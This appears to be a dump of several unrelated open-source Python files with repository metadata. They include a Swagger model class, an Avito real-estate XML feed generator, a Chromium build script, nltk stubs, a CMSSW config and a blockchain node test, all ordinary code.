:rtype: int """ return self._page_number @page_number.setter def page_number(self, page_number): """ Sets the page_number of this FlowOutcomeDivisionViewEntityListing. :param page_number: The page_number of this FlowOutcomeDivisionViewEntityListing. :type: int """ self._page_number = page_number @property def total(self): """ Gets the total of this FlowOutcomeDivisionViewEntityListing. :return: The total of this FlowOutcomeDivisionViewEntityListing. :rtype: int """ return self._total @total.setter def total(self, total): """ Sets the total of this FlowOutcomeDivisionViewEntityListing. :param total: The total of this FlowOutcomeDivisionViewEntityListing. :type: int """ self._total = total @property def first_uri(self): """ Gets the first_uri of this FlowOutcomeDivisionViewEntityListing. :return: The first_uri of this FlowOutcomeDivisionViewEntityListing. :rtype: str """ return self._first_uri @first_uri.setter def first_uri(self, first_uri): """ Sets the first_uri of this FlowOutcomeDivisionViewEntityListing. :param first_uri: The first_uri of this FlowOutcomeDivisionViewEntityListing. :type: str """ self._first_uri = first_uri @property def self_uri(self): """ Gets the self_uri of this FlowOutcomeDivisionViewEntityListing. :return: The self_uri of this FlowOutcomeDivisionViewEntityListing. :rtype: str """ return self._self_uri @self_uri.setter def self_uri(self, self_uri): """ Sets the self_uri of this FlowOutcomeDivisionViewEntityListing. :param self_uri: The self_uri of this FlowOutcomeDivisionViewEntityListing. :type: str """ self._self_uri = self_uri @property def next_uri(self): """ Gets the next_uri of this FlowOutcomeDivisionViewEntityListing. :return: The next_uri of this FlowOutcomeDivisionViewEntityListing. :rtype: str """ return self._next_uri @next_uri.setter def next_uri(self, next_uri): """ Sets the next_uri of this FlowOutcomeDivisionViewEntityListing. :param next_uri: The next_uri of this FlowOutcomeDivisionViewEntityListing. 
:type: str """ self._next_uri = next_uri @property def previous_uri(self): """ Gets the previous_uri of this FlowOutcomeDivisionViewEntityListing. :return: The previous_uri of this FlowOutcomeDivisionViewEntityListing. :rtype: str """ return self._previous_uri @previous_uri.setter def previous_uri(self, previous_uri): """ Sets the previous_uri of this FlowOutcomeDivisionViewEntityListing. :param previous_uri: The previous_uri of this FlowOutcomeDivisionViewEntityListing. :type: str """ self._previous_uri = previous_uri @property def last_uri(self): """ Gets the last_uri of this FlowOutcomeDivisionViewEntityListing. :return: The last_uri of this FlowOutcomeDivisionViewEntityListing. :rtype: str """ return self._last_uri @last_uri.setter def last_uri(self, last_uri): """ Sets the last_uri of this FlowOutcomeDivisionViewEntityListing. :param last_uri: The last_uri of this FlowOutcomeDivisionViewEntityListing. :type: str """ self._last_uri = last_uri @property def page_count(self): """ Gets the page_count of this FlowOutcomeDivisionViewEntityListing. :return: The page_count of this FlowOutcomeDivisionViewEntityListing. :rtype: int """ return self._page_count @page_count.setter def page_count(self, page_count): """ Sets the page_count of this FlowOutcomeDivisionViewEntityListing. :param page_count: The page_count of this FlowOutcomeDivisionViewEntityListing. 
:type: int """ self._page_count = page_count def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_json(self): """ Returns the model as raw JSON """ return json.dumps(sanitize_for_serialization(self.to_dict())) def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other
[ "purecloud-jenkins@ininica.com" ]
purecloud-jenkins@ininica.com
07a0488b1aea8b5844b465d7c255d1e90e95f08c
45034fd848c701ecdcb5f3bd1d3ea43d24abce2d
/agency/xml/feed_avito.py
cb819342318182284342678e39ff819c7382551e
[]
no_license
JazinBazin/height
b5740d17fb5e6e184f8af40d16ccad12d57cea58
06fd76fc62567efd3688688197cc66a205a0c309
refs/heads/master
2020-05-20T17:05:20.892218
2019-06-29T13:40:40
2019-06-29T13:40:40
185,679,726
0
0
null
null
null
null
UTF-8
Python
false
false
4,041
py
import xml.etree.ElementTree as ET avito_feed_file_name = 'feed_avito.xml' def avito_add_lot_offer(instance): try: if instance.transaction_type != 'p': return tree = ET.parse(avito_feed_file_name) feed = tree.getroot() avito_create_lot_offer(feed, instance) tree.write(avito_feed_file_name, encoding='UTF-8', xml_declaration=False) except Exception as ex: with open('log.txt', 'a') as log_file: log_file.write('error in function avito_add_lot_offer. pk = ' + str(instance.pk) + '\nwhat: ' + str(ex) + '\n') def avito_remove_lot_offer(pk): try: pk = str(pk) tree = ET.parse(avito_feed_file_name) feed = tree.getroot() for ad in feed: ad_id = ad.find('Id') if ad_id.text == pk: feed.remove(ad) break tree.write(avito_feed_file_name, encoding='UTF-8', xml_declaration=False) except Exception as ex: with open('log.txt', 'a') as log_file: log_file.write('error in function avito_remove_lot_offer. pk = ' + str(pk) + '\nwhat: ' + str(ex) + '\n') def avito_update_lot_offer(instance): avito_remove_lot_offer(instance.pk) avito_add_lot_offer(instance) def avito_create_lot_offer(feed, instance): Ad = ET.Element('Ad') feed.append(Ad) ad_id = ET.SubElement(Ad, 'Id') ad_id.text = str(instance.pk) AllowEmail = ET.SubElement(Ad, 'AllowEmail') AllowEmail.text = 'Да' ManagerName = ET.SubElement(Ad, 'ManagerName') ManagerName.text = 'Юденич Светлана Станиславовна' ContactPhone = ET.SubElement(Ad, 'ContactPhone') ContactPhone.text = '+7 (978) 834-31-76' Address = ET.SubElement(Ad, 'Address') Address.text = 'Россия, Крым' if instance.district: Address.text += ', ' + str(instance.district) if 'район' not in str(instance.district).lower(): Address.text += ' район' if instance.populated_area: Address.text += ', ' + str(instance.populated_area) DistanceToCity = ET.SubElement(Ad, 'DistanceToCity') DistanceToCity.text = '0' Description = ET.SubElement(Ad, 'Description') Description.text = str(instance.description) Category = ET.SubElement(Ad, 'Category') Category.text = 'Земельные участки' OperationType 
= ET.SubElement(Ad, 'OperationType') OperationType.text = 'Продам' Price = ET.SubElement(Ad, 'Price') if instance.currency == 'r': Price.text = str(int(instance.price)) elif instance.currency == 'd': Price.text = str(int(instance.price * 60)) else: Price.text = str(int(instance.price * 70)) LandArea = ET.SubElement(Ad, 'LandArea') if instance.area_units == 'm': LandArea.text = str(int(instance.area / 100)) elif instance.area_units == 'h': LandArea.text = str(int(instance.area * 100)) else: LandArea.text = str(int(instance.area)) PropertyRights = ET.SubElement(Ad, 'PropertyRights') if instance.cadastral_number: PropertyRights.text = 'Собственник' CadastralNumber = ET.SubElement(Ad, 'CadastralNumber') CadastralNumber.text = str(instance.cadastral_number) else: PropertyRights.text = 'Посредник' ObjectType = ET.SubElement(Ad, 'ObjectType') if instance.lot_type == 'i': ObjectType.text = 'Поселений (ИЖС)' else: ObjectType.text = 'Сельхозназначения (СНТ, ДНП)' Images = ET.SubElement(Ad, 'Images') Image = ET.SubElement(Images, 'Image') Image.set('url', 'https://высота-крым.рф' + str(instance.image.url)) for photo in instance.images.all(): Image = ET.SubElement(Images, 'Image') Image.set('url', 'https://высота-крым.рф' + str(photo.image.url))
[ "yudenichaa@yandex.ru" ]
yudenichaa@yandex.ru
c9b0c8e2dfee1bbb42c1b6a641db68ca4e2c25d9
037877a31670a85fa78b61df9ceabe981cfdfbf6
/sympy/concrete/__init__.py
ad08eb41b7aa48ef70be397eb1ba68e3f15b61f0
[]
no_license
certik/sympy_gamma
6343b02e5d6d1c7d511a3329bbbd27cd11cd7ec8
b0e555ca03f8476533cb1c19575f4461533837de
refs/heads/master
2020-12-25T03:52:40.132034
2010-02-15T08:02:31
2010-02-15T08:02:31
344,391
2
2
null
null
null
null
UTF-8
Python
false
false
136
py
from products import product, Product from summations import sum, Sum from sums_products import Sum2 from gosper import normal, gosper
[ "ondrej@certik.cz" ]
ondrej@certik.cz
03dfab3cd71fc24f153386023aa51f38c46348bd
612325535126eaddebc230d8c27af095c8e5cc2f
/src/build/android/gyp/pack_relocations.py
89c01f05a61391682feebe40ddd3c8c1930db4b5
[ "BSD-3-Clause" ]
permissive
TrellixVulnTeam/proto-quic_1V94
1a3a03ac7a08a494b3d4e9857b24bb8f2c2cd673
feee14d96ee95313f236e0f0e3ff7719246c84f7
refs/heads/master
2023-04-01T14:36:53.888576
2019-10-17T02:23:04
2019-10-17T02:23:04
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,671
py
#!/usr/bin/env python # # Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Pack relocations in a library (or copy unchanged). If --enable-packing and --configuration-name=='Release', invoke the relocation_packer tool to pack the .rel.dyn or .rela.dyn section in the given library files. This step is inserted after the libraries are stripped. If --enable-packing is zero, the script copies files verbatim, with no attempt to pack relocations. """ import ast import optparse import os import shutil import sys import tempfile from util import build_utils def PackLibraryRelocations(android_pack_relocations, library_path, output_path): shutil.copy(library_path, output_path) pack_command = [android_pack_relocations, output_path] build_utils.CheckOutput(pack_command) def CopyLibraryUnchanged(library_path, output_path): shutil.copy(library_path, output_path) def main(args): args = build_utils.ExpandFileArgs(args) parser = optparse.OptionParser() build_utils.AddDepfileOption(parser) parser.add_option('--clear-dir', action='store_true', help='If set, the destination directory will be deleted ' 'before copying files to it. This is highly recommended to ' 'ensure that no stale files are left in the directory.') parser.add_option('--configuration-name', default='Release', help='Gyp configuration name (i.e. 
Debug, Release)') parser.add_option('--enable-packing', choices=['0', '1'], help=('Pack relocations if 1 and configuration name is \'Release\',' ' otherwise plain file copy')) parser.add_option('--android-pack-relocations', help='Path to the relocations packer binary') parser.add_option('--stripped-libraries-dir', help='Directory for stripped libraries') parser.add_option('--packed-libraries-dir', help='Directory for packed libraries') parser.add_option('--libraries', action='append', help='List of libraries in Python dictionary format') parser.add_option('--stamp', help='Path to touch on success') parser.add_option('--filelistjson', help='Output path of filelist.json to write') options, _ = parser.parse_args(args) enable_packing = (options.enable_packing == '1' and options.configuration_name == 'Release') libraries = [] for libs_arg in options.libraries: libraries += ast.literal_eval(libs_arg) if options.clear_dir: build_utils.DeleteDirectory(options.packed_libraries_dir) build_utils.MakeDirectory(options.packed_libraries_dir) output_paths = [] for library in libraries: library_path = os.path.join(options.stripped_libraries_dir, library) output_path = os.path.join( options.packed_libraries_dir, os.path.basename(library)) output_paths.append(output_path) if enable_packing: PackLibraryRelocations(options.android_pack_relocations, library_path, output_path) else: CopyLibraryUnchanged(library_path, output_path) if options.filelistjson: build_utils.WriteJson({ 'files': output_paths }, options.filelistjson) output_paths.append(options.filelistjson) if options.depfile: build_utils.WriteDepfile(options.depfile, output_paths[-1], libraries) if options.stamp: build_utils.Touch(options.stamp) return 0 if __name__ == '__main__': sys.exit(main(sys.argv[1:]))
[ "2100639007@qq.com" ]
2100639007@qq.com
b5261996143a809047a41f5fd39fe46b57b79f0c
15b12d69ac3123d1562986970ce01d7a47d171de
/typings/nltk/misc/wordfinder.pyi
8fbb7b9a5fbec1e043e6e51712347842946e93d0
[ "Apache-2.0" ]
permissive
simplymanas/python-learning
9b67b5a7acfb3a7c2455a7d1fc66203a2b419c37
75bc99c0dce211fd1bce5f6ce1155e0f4c71d7d0
refs/heads/master
2021-07-11T06:40:24.803589
2021-06-20T12:06:02
2021-06-20T12:06:02
241,769,614
5
1
null
null
null
null
UTF-8
Python
false
false
1,103
pyi
""" This type stub file was generated by pyright. """ def revword(word): ... def step(word, x, xf, y, yf, grid): ... def check(word, dir, x, y, grid, rows, cols): ... def wordfinder(words, rows=..., cols=..., attempts=..., alph=...): """ Attempt to arrange words into a letter-grid with the specified number of rows and columns. Try each word in several positions and directions, until it can be fitted into the grid, or the maximum number of allowable attempts is exceeded. Returns a tuple consisting of the grid and the words that were successfully placed. :param words: the list of words to be put into the grid :type words: list :param rows: the number of rows in the grid :type rows: int :param cols: the number of columns in the grid :type cols: int :param attempts: the number of times to attempt placing a word :type attempts: int :param alph: the alphabet, to be used for filling blank cells :type alph: list :rtype: tuple """ ... def word_finder(): ... if __name__ == '__main__': ...
[ "manas.dash@tesco.com" ]
manas.dash@tesco.com
6f9545c1c44ca8d988e519fb3ea7915411b32e56
bf76afd4a984e5cee607a76f2bb9490797010b33
/accounts/api/urls.py
33d0ccc97a22e3b2c5a927ae38ee366e7f23f25f
[]
no_license
itsloys/tweet
a0c75718dd78971aae03129895b0e710dad0b7cc
dfd3a745ac83842999ca9af9085ab26adb150295
refs/heads/master
2021-09-07T02:51:33.646734
2018-02-16T05:55:49
2018-02-16T05:55:49
null
0
0
null
null
null
null
UTF-8
Python
false
false
189
py
from django.conf.urls import url from tweets.api.views import ( TweetListAPIView ) urlpatterns = [ url(r'^(?P<username>[\w.@+-]+)/tweet/$', TweetListAPIView.as_view(), name='list'), ]
[ "louisaleksieb.dagusen@gmail.com" ]
louisaleksieb.dagusen@gmail.com
ead0e0a903999cb85caad2b76d28601ad31e19a1
590a4f34de0dd9b964b52e41d84cf3218609c9d4
/climbingStairs.py
1ca699fb1a7c1009fc8ee36c297063024d7130f0
[]
no_license
zhrmrz/climbingStairs
81d97c5b23b811116192ea27172170a9ff55aa68
0455ad42e56dca3a1ee66c121323faf90d1efc98
refs/heads/master
2020-04-23T03:50:25.962986
2019-02-15T15:52:32
2019-02-15T15:52:32
170,889,452
0
0
null
null
null
null
UTF-8
Python
false
false
316
py
class Sol: def climbing_stairs(self,numOfStairs): if numOfStairs ==1 or numOfStairs ==0: return 1 return self.climbing_stairs(numOfStairs - 1) + self.climbing_stairs(numOfStairs - 2) if __name__ == '__main__': numOfStairs=5 p1=Sol() print(p1.climbing_stairs(numOfStairs))
[ "noreply@github.com" ]
zhrmrz.noreply@github.com
666e846a19ec40bfb77ca6238787a9f10d1e0bc6
aaad70e69d37f92c160c07e4ca03de80becf2c51
/filesystem/usr/lib/python3.6/typing.py
38eba04e677eb46599d1e8690a84dbc547044f3f
[]
no_license
OSWatcher/ubuntu-server
9b4dcad9ced1bff52ec9cdb4f96d4bdba0ad3bb9
17cb333124c8d48cf47bb9cec1b4e1305626b17a
refs/heads/master
2023-02-10T18:39:43.682708
2020-12-26T01:02:54
2020-12-26T01:02:54
null
0
0
null
null
null
null
UTF-8
Python
false
false
186
py
{ "MIME": "text/x-python", "inode_type": "REG", "magic_type": "Python script, ASCII text executable", "mode": "-rw-r--r--", "sha1": "827ca9e64ac471213db81b20b50191728a1e0db3" }
[ "mathieu.tarral@protonmail.com" ]
mathieu.tarral@protonmail.com
c2d8c4486d51afdfedb04e6bdffca8563e713970
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p02801/s692186683.py
101c9198ef90d45399d7eca841820863bdf5ef86
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
39
py
C = input() D = chr(ord(C)+1) print(D)
[ "66529651+Aastha2104@users.noreply.github.com" ]
66529651+Aastha2104@users.noreply.github.com
e7d02b3f6ce84fe8eae213ef42f6cb8167f57557
6f69ec5f27716b36d7a61b2d150408118bb65559
/app/views/clients.py
5dd16656b768657d3c7388690c44440372371d8c
[ "MIT" ]
permissive
m3ssana/memegen
a3c35a51cc7a45e9ab3556ee5665775b578985f8
20510753d7c6811a75295580f6fdb2c459124e7d
refs/heads/main
2023-03-15T18:50:23.546416
2022-07-12T21:19:46
2022-07-12T21:19:46
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,515
py
from sanic import Blueprint, response from sanic_ext import openapi from .. import utils from .helpers import preview_image from .schemas import AuthResponse, ErrorResponse blueprint = Blueprint("clients", url_prefix="/") @blueprint.post("/auth") @openapi.summary("Validate your API key") @openapi.response(200, {"application/json": AuthResponse}, "Your API key is valid") @openapi.response(401, {"application/json": ErrorResponse}, "Your API key is invalid") async def validate(request): info = await utils.meta.authenticate(request) return response.json( info or {"error": "API key missing or invalid."}, status=200 if info else 401, ) @blueprint.get("/images/preview.jpg") @openapi.summary("Display a preview of a custom meme") @openapi.parameter("text[]", str, "query", description="Lines of text to render") @openapi.parameter("style", str, "query", description="Style name or custom overlay") @openapi.parameter( "template", str, "query", description="Template ID, URL, or custom background" ) @openapi.response(200, {"image/jpeg": bytes}, "Successfully displayed a custom meme") async def preview(request): id = request.args.get("template", "_error") lines = request.args.getlist("text[]") or request.args.getlist("lines[]") or [] style = request.args.get("style") or ",".join(request.args.getlist("styles[]", [])) while style.endswith(",default"): style = style.removesuffix(",default") return await preview_image(request, id, lines, style)
[ "jacebrowning@gmail.com" ]
jacebrowning@gmail.com
2525bb90231a226a0ea32ccb99249f17ba841247
60715c9ea4c66d861708531def532814eab781fd
/python-programming-workshop/list/24.listmethods.py
4cee5ef936923f1209b1adfc70b9c2d7c66add57
[]
no_license
bala4rtraining/python_programming
6ce64d035ef04486f5dc9572cb0975dd322fcb3e
99a5e6cf38448f5a01b310d5f7fa95493139b631
refs/heads/master
2023-09-03T00:10:26.272124
2021-11-01T08:20:52
2021-11-01T08:20:52
null
0
0
null
null
null
null
UTF-8
Python
false
false
467
py
fruits = ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] print(fruits[0]) print(fruits.count('apple')) print(fruits.count('tangerine')) print(fruits.index('banana')) print(fruits.index('banana', 4)) # Find next banana starting a position 4 print(fruits.reverse()) # the fruits reverse is returning None print(fruits) fruits.append('grape') print(fruits) fruits.sort() print(fruits) fruits.pop() print(fruits) fruits.remove('apple') print(fruits)
[ "karthikkannan@gmail.com" ]
karthikkannan@gmail.com
c18ebb7f50f1f17388bcd0a8d07ad564c0918332
e570b6d6ffee8b600d0047ff9eeb8eb671660a58
/7. NLTK/NLTK Code.py
40695e3ab519bbe04b320d5813447a5f4f4e4df1
[]
no_license
ShashankSinha98/MachineLearning
06619687bb83a47c9425dee3a5947747f49bbbb8
3b6e94107a8dad6bd25faef400bcc94ed1a77ca4
refs/heads/master
2022-07-09T14:33:44.674227
2020-05-12T19:27:22
2020-05-12T19:27:22
256,843,189
0
0
null
null
null
null
UTF-8
Python
false
false
650
py
#!/usr/bin/env python # coding: utf-8 # In[7]: import nltk # In[9]: from nltk.corpus import brown # In[10]: # Corpus- Large collection of text brown.categories() # In[11]: data = brown.sents(categories='fiction') # In[18]: print(" ".join(data[1])) # In[19]: from nltk.corpus import stopwords sw = set(stopwords.words('english')) # In[21]: print(len(sw)) # In[22]: def remove_stopwords(words,sw): useful_words = [] useful_words = [w for w in words if w not in sw] return useful_words # In[24]: setence = "I do not love her very much" ans = remove_stopwords(setence.split(),sw) print(ans) # In[ ]:
[ "34626597+ShashankSinha98@users.noreply.github.com" ]
34626597+ShashankSinha98@users.noreply.github.com
36cc8b3c58ca68674925a18aac8712498e09708e
d225ec04301d8abd681d68ad8d7316befc404bc1
/ZShape/EffAcc/python/scans/EE_mean_Apr12_1251_cfg.py
e60ceb0aea80a1df554aef8fd6b6e2792995aa08
[]
no_license
UMN-CMS/ZShape_Analysis
372ea0083d6c0bda2dbba30322ef01269501afa8
83bff158b21210b048afbcff0af1e803780ad4bd
refs/heads/master
2020-06-07T10:34:40.227684
2013-12-11T16:59:25
2013-12-11T16:59:25
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,424
py
import FWCore.ParameterSet.Config as cms process = cms.Process("Zefficiency") process.TimerService = cms.Service("TimerService") process.load('FWCore.MessageService.MessageLogger_cfi') process.MessageLogger.cerr.FwkReport.reportEvery = 1000 process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True), SkipEvent = cms.untracked.vstring('ProductNotFound') ) process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(30000) ) process.source = cms.Source("PoolSource", duplicateCheckMode = cms.untracked.string('noDuplicateCheck'), fileNames = cms.untracked.vstring("file:/home/jmmans/data/zshape/Summer11_DYToEE_M-20_CT10_TuneZ2_7TeV-powheg-pythia/F61A0CD6-9AA8-E011-A92B-0024E8769B05.root" ) ) process.TFileService = cms.Service("TFileService", fileName = cms.string('histo_10M_partBUILDINGTTEST.root') ) process.f2s = cms.EDProducer("ZFullSim2Event" ) import ZShape.EffAcc.FullSimSmearedElectronProducer_cfi import ZShape.EffAcc.ZEfficiencyKevin_cfi process.EEXmeanX0X989Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X989Xsmear.EE.mean = cms.double(0.989) process.EEXmeanX0X989 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() process.EEXmeanX0X989.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X989.zsrc = cms.untracked.InputTag("EEXmeanX0X989Xsmear","ZEventParticles") process.EEXmeanX0X989.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X989Xsmear","ZEventParticles") process.EEXmeanX0X990Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X990Xsmear.EE.mean = cms.double(0.990) process.EEXmeanX0X990 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() process.EEXmeanX0X990.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X990.zsrc = cms.untracked.InputTag("EEXmeanX0X990Xsmear","ZEventParticles") 
process.EEXmeanX0X990.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X990Xsmear","ZEventParticles") process.EEXmeanX0X991Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X991Xsmear.EE.mean = cms.double(0.991) process.EEXmeanX0X991 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() process.EEXmeanX0X991.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X991.zsrc = cms.untracked.InputTag("EEXmeanX0X991Xsmear","ZEventParticles") process.EEXmeanX0X991.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X991Xsmear","ZEventParticles") process.EEXmeanX0X992Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X992Xsmear.EE.mean = cms.double(0.992) process.EEXmeanX0X992 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() process.EEXmeanX0X992.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X992.zsrc = cms.untracked.InputTag("EEXmeanX0X992Xsmear","ZEventParticles") process.EEXmeanX0X992.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X992Xsmear","ZEventParticles") process.EEXmeanX0X993Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X993Xsmear.EE.mean = cms.double(0.993) process.EEXmeanX0X993 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() process.EEXmeanX0X993.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X993.zsrc = cms.untracked.InputTag("EEXmeanX0X993Xsmear","ZEventParticles") process.EEXmeanX0X993.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X993Xsmear","ZEventParticles") process.EEXmeanX0X994Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X994Xsmear.EE.mean = cms.double(0.994) process.EEXmeanX0X994 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() 
process.EEXmeanX0X994.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X994.zsrc = cms.untracked.InputTag("EEXmeanX0X994Xsmear","ZEventParticles") process.EEXmeanX0X994.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X994Xsmear","ZEventParticles") process.EEXmeanX0X995Xsmear = ZShape.EffAcc.FullSimSmearedElectronProducer_cfi.FullSimSmearedElectronsProducer.clone() process.EEXmeanX0X995Xsmear.EE.mean = cms.double(0.995) process.EEXmeanX0X995 = ZShape.EffAcc.ZEfficiencyKevin_cfi.mcEff.clone() process.EEXmeanX0X995.zTreeLevelElectronsCollection = cms.untracked.InputTag("f2s","ZEventEle3") process.EEXmeanX0X995.zsrc = cms.untracked.InputTag("EEXmeanX0X995Xsmear","ZEventParticles") process.EEXmeanX0X995.zElectronsCollection = cms.untracked.InputTag("EEXmeanX0X995Xsmear","ZEventParticles") process.load("RecoEgamma.EgammaHFProducers.hfEMClusteringSequence_cff") process.p = cms.Path(process.hfRecoEcalCandidate+process.f2s + process.EEXmeanX0X989Xsmear + process.EEXmeanX0X989 + process.EEXmeanX0X990Xsmear + process.EEXmeanX0X990 + process.EEXmeanX0X991Xsmear + process.EEXmeanX0X991 + process.EEXmeanX0X992Xsmear + process.EEXmeanX0X992 + process.EEXmeanX0X993Xsmear + process.EEXmeanX0X993 + process.EEXmeanX0X994Xsmear + process.EEXmeanX0X994 + process.EEXmeanX0X995Xsmear + process.EEXmeanX0X995 )
[ "klapoetke@physics.umn.edu" ]
klapoetke@physics.umn.edu
8064eb59894b1a18df1ff8998010971ec3b593f0
9cabdeb8dce5718e8f4f490f3684eba0eb1f2d2e
/test/functional/minchainwork.py
159c107cadbc5d27259a8c9fbe3ae4678e647321
[ "MIT" ]
permissive
wolfoxonly/woo
fcfe275007cb102fff10239b0f722264dbbd40e2
a5fb13575afe855b58915bd8e15cbffb9015e5e2
refs/heads/master
2020-03-09T17:00:57.668308
2018-05-13T15:21:17
2018-05-13T15:21:17
127,590,136
0
0
null
null
null
null
UTF-8
Python
false
false
3,949
py
#!/usr/bin/env python3 # Copyright (c) 2017 The Woochain Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test logic for setting nMinimumChainWork on command line. Nodes don't consider themselves out of "initial block download" until their active chain has more work than nMinimumChainWork. Nodes don't download blocks from a peer unless the peer's best known block has more work than nMinimumChainWork. While in initial block download, nodes won't relay blocks to their peers, so test that this parameter functions as intended by verifying that block relay only succeeds past a given node once its nMinimumChainWork has been exceeded. """ import time from test_framework.test_framework import WoochainTestFramework from test_framework.util import connect_nodes, assert_equal # 2 hashes required per regtest block (with no difficulty adjustment) REGTEST_WORK_PER_BLOCK = 2 class MinimumChainWorkTest(WoochainTestFramework): def set_test_params(self): self.setup_clean_chain = True self.num_nodes = 3 self.extra_args = [[], ["-minimumchainwork=0x65"], ["-minimumchainwork=0x65"]] self.node_min_work = [0, 101, 101] def setup_network(self): # This test relies on the chain setup being: # node0 <- node1 <- node2 # Before leaving IBD, nodes prefer to download blocks from outbound # peers, so ensure that we're mining on an outbound peer and testing # block relay to inbound peers. self.setup_nodes() for i in range(self.num_nodes-1): connect_nodes(self.nodes[i+1], i) def run_test(self): # Start building a chain on node0. 
node2 shouldn't be able to sync until node1's # minchainwork is exceeded starting_chain_work = REGTEST_WORK_PER_BLOCK # Genesis block's work self.log.info("Testing relay across node %d (minChainWork = %d)", 1, self.node_min_work[1]) starting_blockcount = self.nodes[2].getblockcount() num_blocks_to_generate = int((self.node_min_work[1] - starting_chain_work) / REGTEST_WORK_PER_BLOCK) self.log.info("Generating %d blocks on node0", num_blocks_to_generate) hashes = self.nodes[0].generate(num_blocks_to_generate) self.log.info("Node0 current chain work: %s", self.nodes[0].getblockheader(hashes[-1])['chainwork']) # Sleep a few seconds and verify that node2 didn't get any new blocks # or headers. We sleep, rather than sync_blocks(node0, node1) because # it's reasonable either way for node1 to get the blocks, or not get # them (since they're below node1's minchainwork). time.sleep(3) self.log.info("Verifying node 2 has no more blocks than before") self.log.info("Blockcounts: %s", [n.getblockcount() for n in self.nodes]) # Node2 shouldn't have any new headers yet, because node1 should not # have relayed anything. assert_equal(len(self.nodes[2].getchaintips()), 1) assert_equal(self.nodes[2].getchaintips()[0]['height'], 0) assert self.nodes[1].getbestblockhash() != self.nodes[0].getbestblockhash() assert_equal(self.nodes[2].getblockcount(), starting_blockcount) self.log.info("Generating one more block") self.nodes[0].generate(1) self.log.info("Verifying nodes are all synced") # Because nodes in regtest are all manual connections (eg using # addnode), node1 should not have disconnected node0. If not for that, # we'd expect node1 to have disconnected node0 for serving an # insufficient work chain, in which case we'd need to reconnect them to # continue the test. self.sync_all() self.log.info("Blockcounts: %s", [n.getblockcount() for n in self.nodes]) if __name__ == '__main__': MinimumChainWorkTest().main()
[ "415313577@qq.com" ]
415313577@qq.com
f1b6352f34d1c818206ce4aea972ca832c438851
208d8a40d1497b1623a9ea78ece4a493e5182661
/redwood/settings.py
a34acff441c423ca7fc5296cf908b114ce437a42
[]
no_license
muremwa/RedWood
273de7c5edfac3b43c4e91f03921062375312912
c0735999f517b280de8211022daeead4ea45bb17
refs/heads/master
2021-07-08T02:17:09.659659
2020-08-09T15:33:51
2020-08-09T15:33:51
166,394,652
2
0
null
null
null
null
UTF-8
Python
false
false
3,454
py
